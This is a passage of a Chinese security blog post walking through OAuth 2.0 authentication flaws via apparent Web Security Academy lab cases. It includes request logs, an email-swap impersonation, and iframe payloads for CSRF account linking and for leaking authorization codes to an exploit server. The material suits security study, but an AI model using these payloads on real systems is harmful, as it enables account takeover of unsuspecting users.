<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"rerestst.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.14.2","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文内容梦里想到，纯属虚构！ OAuth常见位置用户选择使用社交媒体帐户登录 12GET &#x2F;authorization?client_id&#x3D;12345&amp;redirect_uri&#x3D;https:&#x2F;&#x2F;client-app.com&#x2F;callback&amp;response_type&#x3D;token&amp;scope&#x3D;openid%20profile&amp;state&#x3D;ae13d489bd00e3">
<meta property="og:type" content="article">
<meta property="og:title" content="OAuth 2.0身份验证漏洞攻略">
<meta property="og:url" content="https://rerestst.github.io/2025/04/16/OAuth%202.0%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="rerestst&#39;s blog">
<meta property="og:description" content="本文内容梦里想到，纯属虚构！ OAuth常见位置用户选择使用社交媒体帐户登录 12GET &#x2F;authorization?client_id&#x3D;12345&amp;redirect_uri&#x3D;https:&#x2F;&#x2F;client-app.com&#x2F;callback&amp;response_type&#x3D;token&amp;scope&#x3D;openid%20profile&amp;state&#x3D;ae13d489bd00e3">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-04-15T18:18:43.000Z">
<meta property="article:modified_time" content="2025-04-18T09:58:39.674Z">
<meta property="article:author" content="rerestst">
<meta property="article:tag" content="OAuth">
<meta property="article:tag" content="身份验证">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://rerestst.github.io/2025/04/16/OAuth%202.0%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://rerestst.github.io/2025/04/16/OAuth%202.0%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E/","path":"2025/04/16/OAuth 2.0身份验证漏洞/","title":"OAuth 2.0身份验证漏洞攻略"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>OAuth 2.0身份验证漏洞攻略 | rerestst's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">rerestst's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">6</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">18</span></a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#OAuth%E5%B8%B8%E8%A7%81%E4%BD%8D%E7%BD%AE"><span class="nav-number">1.</span> <span class="nav-text">OAuth常见位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%94%B6%E9%9B%86%E4%BF%A1%E6%81%AF"><span class="nav-number">2.</span> <span class="nav-text">收集信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%A2%E6%88%B7%E7%AB%AF%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.</span> <span class="nav-text">客户端应用程序中的漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%9A%90%E5%BC%8F%E6%8E%88%E6%9D%83%E7%B1%BB%E5%9E%8B%E6%89%A7%E8%A1%8C%E4%B8%8D%E5%BD%93"><span class="nav-number">3.0.1.</span> <span class="nav-text">隐式授权类型执行不当</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%A1%88%E4%BE%8B%EF%BC%9A%E9%80%9A%E8%BF%87OAuth%E9%9A%90%E5%BC%8F%E6%B5%81%E7%A8%8B%E7%BB%95%E8%BF%87%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81"><span class="nav-number">3.0.1.0.1.</span> <span class="nav-text">案例：通过OAuth隐式流程绕过身份验证</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AD%98%E5%9C%A8%E7%BC%BA%E9%99%B7%E7%9A%84CSRF%E4%BF%9D%E6%8A%A4"><span class="nav-number">3.0.2.</span> <span class="nav-text">存在缺陷的CSRF保护</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%A1%88%E4%BE%8B%EF%BC%9A%E5%BC%BA%E5%88%B6OAuth%E5%92%8C%E7%A4%BE%E4%BA%A4%E5%AA%92%E4%BD%93%E9%85%8D%E7%BD%AE%E9%93%BE%E6%8E%A5"><span class="nav-number">3.0.2.0.1.</span> <span class="nav-text">案例：强制OAuth和社交媒体配置链接</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#OAuth%E6%9C%8D%E5%8A%A1%E4%B8%AD%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.</span> <span class="nav-text">OAuth服务中的漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E6%8E%88%E6%9D%83%E7%A0%81%E5%92%8C%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C"><span class="nav-number">4.0.1.</span> <span class="nav-text">泄露授权码和访问令牌</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%A1%88%E4%BE%8B%EF%BC%9A%E9%80%9A%E8%BF%87redirect-uri%E5%8A%AB%E6%8C%81OAuth%E5%B8%90%E6%88%B7"><span class="nav-number">4.0.1.0.1.</span> <span class="nav-text">案例：通过redirect_uri劫持OAuth帐户</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9C%89%E7%BC%BA%E9%99%B7%E7%9A%84redirect-uri%E9%AA%8C%E8%AF%81"><span class="nav-number">4.0.1.1.</span> <span class="nav-text">有缺陷的redirect_uri验证</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E4%BB%A3%E7%90%86%E9%A1%B5%E9%9D%A2%E7%AA%83%E5%8F%96%E6%8E%88%E6%9D%83%E7%A0%81%E5%92%8C%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C"><span class="nav-number">4.0.1.2.</span> <span class="nav-text">通过代理页面窃取授权码和访问令牌</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%A1%88%E4%BE%8B%EF%BC%9A%E9%80%9A%E8%BF%87%E5%BC%80%E6%94%BE%E9%87%8D%E5%AE%9A%E5%90%91%E7%AA%83%E5%8F%96OAuth%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C"><span class="nav-number">4.0.1.2.1.</span> <span class="nav-text">案例：通过开放重定向窃取OAuth访问令牌</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.0.1.2.2.</span> <span class="nav-text">其他漏洞</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%A1%88%E4%BE%8B%EF%BC%9A%E9%80%9A%E8%BF%87%E4%BB%A3%E7%90%86%E9%A1%B5%E9%9D%A2%E7%AA%83%E5%8F%96OAuth%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C"><span class="nav-number">4.0.1.2.3.</span> <span class="nav-text">案例：通过代理页面窃取OAuth访问令牌</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#scope%E9%AA%8C%E8%AF%81%E5%AD%98%E5%9C%A8%E7%BC%BA%E9%99%B7"><span class="nav-number">4.0.2.</span> <span class="nav-text">scope验证存在缺陷</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#scope-upgrade%EF%BC%9A%E6%8E%88%E6%9D%83%E7%A0%81%E6%B5%81%E7%A8%8B"><span class="nav-number">4.0.2.1.</span> <span class="nav-text">scope upgrade：授权码流程</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#scope-upgrade%EF%BC%9A%E9%9A%90%E5%BC%8F%E6%B5%81%E7%A8%8B"><span class="nav-number">4.0.2.2.</span> <span class="nav-text">scope upgrade：隐式流程</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9C%AA%E7%BB%8F%E9%AA%8C%E8%AF%81%E7%9A%84%E7%94%A8%E6%88%B7%E6%B3%A8%E5%86%8C"><span class="nav-number">4.0.3.</span> <span class="nav-text">未经验证的用户注册</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%84%E9%98%B2OAuth%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E"><span class="nav-number">5.</span> <span class="nav-text">预防OAuth身份验证漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AF%B9%E4%BA%8EOAuth%E6%9C%8D%E5%8A%A1%E6%8F%90%E4%BE%9B%E5%95%86"><span class="nav-number">5.0.1.</span> <span class="nav-text">对于OAuth服务提供商</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AF%B9%E4%BA%8EOAuth%E5%AE%A2%E6%88%B7%E7%AB%AF%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F"><span class="nav-number">5.0.2.</span> <span class="nav-text">对于OAuth客户端应用程序</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="rerestst"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">rerestst</p>
  <div class="site-description" itemprop="description">test123</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://rerestst.github.io/2025/04/16/OAuth%202.0%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rerestst">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="rerestst's blog">
      <meta itemprop="description" content="test123">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="OAuth 2.0身份验证漏洞攻略 | rerestst's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          OAuth 2.0身份验证漏洞攻略
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-04-16 02:18:43" itemprop="dateCreated datePublished" datetime="2025-04-16T02:18:43+08:00">2025-04-16</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-04-18 17:58:39" itemprop="dateModified" datetime="2025-04-18T17:58:39+08:00">2025-04-18</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%BC%8F%E6%B4%9E%E6%94%BB%E7%95%A5/" itemprop="url" rel="index"><span itemprop="name">漏洞攻略</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>本文内容梦里想到，纯属虚构！</p>
<h2 id="OAuth常见位置"><a href="#OAuth常见位置" class="headerlink" title="OAuth常见位置"></a>OAuth常见位置</h2><p>用户选择使用社交媒体帐户登录</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/authorization?client_id=12345&amp;redirect_uri=https://client-app.com/callback&amp;response_type=token&amp;scope=openid%20profile&amp;state=ae13d489bd00e3c24</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>oauth-authorization-server.com</span><br></pre></td></tr></table></figure>

<span id="more"></span>

<h2 id="收集信息"><a href="#收集信息" class="headerlink" title="收集信息"></a>收集信息</h2><p>当发现授权服务器主机名，可参考公共 API的文档，发送GET请求</p>
<p>&#x2F;.well-known&#x2F;oauth-authorization-server<br>&#x2F;.well-known&#x2F;openid-configuration</p>
<p>这些通常会返回一个包含关键信息的JSON 配置文件，例如可能支持的额外功能的详细信息。</p>
<h2 id="客户端应用程序中的漏洞"><a href="#客户端应用程序中的漏洞" class="headerlink" title="客户端应用程序中的漏洞"></a>客户端应用程序中的漏洞</h2><h4 id="隐式授权类型执行不当"><a href="#隐式授权类型执行不当" class="headerlink" title="隐式授权类型执行不当"></a>隐式授权类型执行不当</h4><p>隐式授权类型：相比于授权码流程，OAuth服务缺少&#x2F;token</p>
<p>在隐式授权类型流程中，访问令牌以 URL 片段的形式通过用户浏览器从 OAuth 服务发送到客户端应用程序。然后，客户端应用程序使用 JavaScript 访问令牌。问题是，如果应用程序想要在用户关闭页面后保持会话，它需要将当前用户数据（通常是用户 ID 和访问令牌）存储在某处。为了解决这个问题，客户端应用程序通常会在请求中将这些数据提交给服务器POST，然后为用户分配一个会话 cookie，从而有效地登录。在这种情况下，服务器没有任何机密或密码可以与提交的数据进行比较，这意味着它是隐式信任的。</p>
<p>在隐式流程中，此POST请求通过浏览器暴露给攻击者。因此，如果客户端应用程序没有正确检查访问令牌是否与请求中的其他数据匹配，则此行为可能会导致严重的漏洞。在这种情况下，攻击者可以简单地更改发送到服务器的参数来冒充任何用户。</p>
<h6 id="案例：通过OAuth隐式流程绕过身份验证"><a href="#案例：通过OAuth隐式流程绕过身份验证" class="headerlink" title="案例：通过OAuth隐式流程绕过身份验证"></a>案例：通过OAuth隐式流程绕过身份验证</h6><p>客户端应用程序的验证存在缺陷</p>
<p>OAuth服务验证后返回token，之后客户端应用程序：</p>
<p>POST &#x2F;authenticate中</p>
<p>{“email”:”<a href="mailto:&#x77;&#x69;&#x65;&#x6e;&#101;&#114;&#x40;&#x68;&#111;&#x74;&#100;&#111;&#103;&#x2e;&#99;&#x6f;&#109;">&#x77;&#x69;&#x65;&#x6e;&#101;&#114;&#x40;&#x68;&#111;&#x74;&#100;&#111;&#103;&#x2e;&#99;&#x6f;&#109;</a>“,”username”:”wiener”,”token”:”Bn3TxxxdZl-jC2B9M8Vz3Nk”}</p>
<p>将email改为</p>
<p>{“email”:”<a href="mailto:&#99;&#x61;&#x72;&#x6c;&#111;&#115;&#64;&#99;&#x61;&#x72;&#108;&#x6f;&#115;&#45;&#x6d;&#x6f;&#x6e;&#x74;&#x6f;&#121;&#97;&#x2e;&#x6e;&#101;&#116;">&#99;&#x61;&#x72;&#x6c;&#111;&#115;&#64;&#99;&#x61;&#x72;&#108;&#x6f;&#115;&#45;&#x6d;&#x6f;&#x6e;&#x74;&#x6f;&#121;&#97;&#x2e;&#x6e;&#101;&#116;</a>“,”username”:”wiener”,”token”:”Bn3TxxxdZl-jC2B9M8Vz3Nk”}</p>
<h4 id="存在缺陷的CSRF保护"><a href="#存在缺陷的CSRF保护" class="headerlink" title="存在缺陷的CSRF保护"></a>存在缺陷的CSRF保护</h4><p>OAuth流程中的许多组件是可选的，强烈推荐state参数</p>
<p>state参数应包含一个不可猜测的值，例如首次启动OAuth流程时与用户会话绑定的某个内容的哈希值。然后，此值作为客户端应用程序的 CSRF 令牌在客户端应用程序和 OAuth 服务之间来回传递。</p>
<p>因此，如果注意到授权请求未发送state参数，可能可以在欺骗用户浏览器完成之前自行启动OAuth流程</p>
<p>如果应用程序未能使用该state参数，攻击者可能会通过将受害用户的帐户绑定到他们自己的社交媒体帐户来劫持客户端应用程序上的受害用户的帐户。</p>
<h6 id="案例：强制OAuth和社交媒体配置链接"><a href="#案例：强制OAuth和社交媒体配置链接" class="headerlink" title="案例：强制OAuth和社交媒体配置链接"></a>案例：强制OAuth和社交媒体配置链接</h6><p>可选择将社交媒体配置关联到自己的帐户，以便可通过OAuth登录，而不必使用常规用户名和密码</p>
<p>由于客户端应用程序对OAuth流程的实施不安全，攻击者可以操纵此功能来获取对其他用户帐户的访问权限。</p>
<p>使用CSRF攻击将自己的社交媒体配置关联到博客网站上的管理员用户帐户，然后访问管理面板并删除carlos。</p>
<p>管理员用户将打开从漏洞服务器发送的任何内容，并且他们始终在博客网站上保持活动会话。</p>
<p>博客网站帐号：wiener:peter<br>社交媒体配置：peter.wiener:hotdog</p>
<p>使用用户名口令普通登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">POST /login</span><br><span class="line">csrf=OScQbnVB5UCKesEOsjejsGe6UDJFDOzX&amp;username=wiener&amp;password=peter</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Set-Cookie: session=9EoiC6qjtGIu5vLM8bXHUii7JyWCyTD0</span><br></pre></td></tr></table></figure>



<p>我的账号–关联一个社交媒体配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">GET /auth?client_id=jdbrd0pki3a6v42esjbl3&amp;redirect_uri=https://target.com/oauth-linking&amp;response_type=code&amp;scope=openid%20profile%20email HTTP/1.1</span><br><span class="line">Host: oauth-server.net</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: /interaction/yGvzVGSd9RhlHqDW5hSFE</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">POST /interaction/yGvzVGSd9RhlHqDW5hSFE/login HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br><span class="line">username=peter.wiener&amp;password=hotdog</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: https://oauth-server.net/auth/yGvzVGSd9RhlHqDW5hSFE</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GET /auth/yGvzVGSd9RhlHqDW5hSFE HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: https://target.com/oauth-linking?code=_Yt4jGhSYThle5tT0a55D58aEQeaG9o8Sc70IVIZnN-</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GET /oauth-linking?code=_Yt4jGhSYThle5tT0a55D58aEQeaG9o8Sc70IVIZnN- HTTP/2</span><br><span class="line">Host: target.com</span><br><span class="line"></span><br><span class="line">HTTP/2 200 OK</span><br></pre></td></tr></table></figure>



<p>观察出OAuth服务将授权代码发送到客户端中，客户端发送授权代码给&#x2F;oauth-linking，请求不包含state用于防止CSRF攻击的参数</p>
<p>再次点击：关联一个社交媒体配置</p>
<p>拦截并丢弃请求：GET &#x2F;oauth-linking?code&#x3D;7OMdbr3MKESPr0wxLIHxLHQyBjPjxkEk4VtJUL7qkJ3</p>
<p>复制 URL，在自己服务器上创建一个页面：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;https://target.com/oauth-linking?code=7OMdbr3MKESPr0wxLIHxLHQyBjPjxkEk4VtJUL7qkJ3&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>将页面传递给受害者，受害者点击后：会使用攻击者的社交媒体配置完成OAuth流程，社交媒体配置关联到受害者用户。</p>
<p>使用用户名口令登录发现关联的社交媒体配置已经移除</p>
<p>使用社交媒体配置登录，可对受害者账户进行管理。</p>
<p>注：如果网站允许用户完全通过OAuth登录，则state参数可能不重要。但是，不使用state参数仍可能允许攻击者构造CSRF攻击诱骗用户登录攻击者的帐户。</p>
<h2 id="OAuth服务中的漏洞"><a href="#OAuth服务中的漏洞" class="headerlink" title="OAuth服务中的漏洞"></a>OAuth服务中的漏洞</h2><h4 id="泄露授权码和访问令牌"><a href="#泄露授权码和访问令牌" class="headerlink" title="泄露授权码和访问令牌"></a>泄露授权码和访问令牌</h4><p>根据授权类型，授权码或令牌将通过受害者的浏览器发送到授权请求参数&#x2F;callback中指定的端点redirect_uri。如果 OAuth 服务无法正确验证此 URI，攻击者可能能够构造类似 CSRF 的攻击，诱骗受害者的浏览器启动 OAuth 流程，该流程会将代码或令牌发送到攻击者控制的redirect_uri。</p>
<p>在授权码流程的情况下，攻击者可以在受害者使用授权码之前窃取它。然后，他们可以将此授权码发送到客户端应用程序的合法&#x2F;callback端点（原本的redirect_uri），以获取对用户帐户的访问权限。在这种情况下，攻击者甚至不需要知道客户端密钥或生成的访问令牌。只要受害者与 OAuth 服务有有效的会话，客户端应用程序就会代攻击者完成授权码&#x2F;令牌交换，然后再将其登录到受害者的帐户。</p>
<p>请注意，使用state或nonce保护不一定能阻止这些攻击，因为攻击者可以从他们自己的浏览器生成新值。</p>
<p>更安全的授权服务器在交换授权码时也需要redirect_uri发送一个参数。然后，服务器可以检查该参数是否与它在初始授权请求中收到的参数相匹配，如果不匹配，则拒绝交换。由于这发生在通过安全后端通道的服务器到服务器请求中，攻击者无法控制第二个redirect_uri参数。</p>
<h6 id="案例：通过redirect-uri劫持OAuth帐户"><a href="#案例：通过redirect-uri劫持OAuth帐户" class="headerlink" title="案例：通过redirect_uri劫持OAuth帐户"></a>案例：通过redirect_uri劫持OAuth帐户</h6><p>窃取与管理员用户相关联的授权码。</p>
<p>打开OAuth登录页面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET /auth?client_id=u0rnzu0w6a4rd3m1grwxl&amp;redirect_uri=https://0adb003204794586804b03a40099008c.web-security-academy.net/oauth-callback&amp;response_type=code&amp;scope=openid%20profile%20email HTTP/1.1</span><br><span class="line">Host: oauth-server.net</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: /interaction/m_trDvnqngh3T-ZXVGgSt</span><br></pre></td></tr></table></figure>



<p>输入自己账户，点登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /interaction/m_trDvnqngh3T-ZXVGgSt/login HTTP/2</span><br><span class="line">Host: oauth-server.net</span><br><span class="line"></span><br><span class="line">username=wiener&amp;password=peter</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">HTTP/2 302 Found</span><br><span class="line">Location: https://target.com/oauth-callback?code=n-4hzohB8y65E3fwGgJzZ5XB5ZfuBiMvZRdAhIMcQE2</span><br><span class="line"></span><br><span class="line">GET /oauth-callback?code=n-4hzohB8y65E3fwGgJzZ5XB5ZfuBiMvZRdAhIMcQE2 HTTP/2</span><br><span class="line">Host: target.com</span><br><span class="line"></span><br><span class="line">HTTP/2 200 OK</span><br></pre></td></tr></table></figure>



<p>构造恶意页面</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;https://oauth-server.net/auth?client_id=grmxun47v0di2xncneluo&amp;redirect_uri=https://exploit-0abb00d2043ab24c808a2047018c0027.exploit-server.net/exploit&amp;response_type=code&amp;scope=openid%20profile%20email&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>发给受害者访问，查看服务器日志：GET &#x2F;?code&#x3D;chQ3LWcZ78XvieNx0RN_WZlCkWw4UXycLEul7n2L1O7</p>
<p>攻击者访问：<a target="_blank" rel="noopener" href="https://target.com/oauth-callback?code=chQ3LWcZ78XvieNx0RN_WZlCkWw4UXycLEul7n2L1O7">https://target.com/oauth-callback?code=chQ3LWcZ78XvieNx0RN_WZlCkWw4UXycLEul7n2L1O7</a></p>
<p>登录了受害者账户</p>
<h5 id="有缺陷的redirect-uri验证"><a href="#有缺陷的redirect-uri验证" class="headerlink" title="有缺陷的redirect_uri验证"></a>有缺陷的redirect_uri验证</h5><p>客户端应用程序在向 OAuth 服务注册时，最好提供其真实回调 URI 的白名单。但仍然可能有方法绕过此验证。</p>
<p>在审核 OAuth 流程时，您应该尝试使用redirect_uri参数进行实验，以了解其验证方式。例如：</p>
<ul>
<li><p>有些实现只检查字符串是否以正确的字符序列（即经批准的域）开始，从而允许使用一系列子目录。您应该尝试删除或添加任意路径、查询参数和片段，看看可以更改哪些内容而不会引发错误。</p>
</li>
